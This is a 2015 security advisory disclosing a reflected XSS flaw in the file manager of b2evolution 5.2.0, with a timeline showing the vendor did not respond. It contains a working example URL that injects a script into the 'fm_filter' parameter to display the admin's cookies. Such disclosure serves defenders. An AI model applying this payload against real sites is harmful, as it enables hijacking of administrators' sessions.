Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v. 5.2.0 Advisory ID: SROEADV-2014-09 Author: Steffen Rösemann Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014) Vendor URL: http://b2evolution.net/ Vendor Status: did not respond to issue CVE-ID: - ========================== Vulnerability Description: ========================== The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks. ================== Technical Details: ================== By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter" parameter of the URL where the filemanager functionality of b2eveolution is located, an attacker could trick an authenticated administrative user to execute the code. Filemanager is located here on a common b2evolution installation: http:// {TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc= Exploit-Example: http:// {TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc= ========= Solution: ========= Vendor did not respond and submitted no solution. ==================== Disclosure Timeline: ==================== 30-Dec-2014 – found the vulnerability 30-Dec-2014 - informed the developers (incl. announcement to release technical details on 13th Jan 2015 if there is no response) 30-Dec-2014 – release date of this security advisory [without technical details] 13-Jan-2015 - vendor did not respond 13-Jan-2015 - release date of this security advisory 13-Jan-2015 - send to lists ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://b2evolution.net/ [2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html [3] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html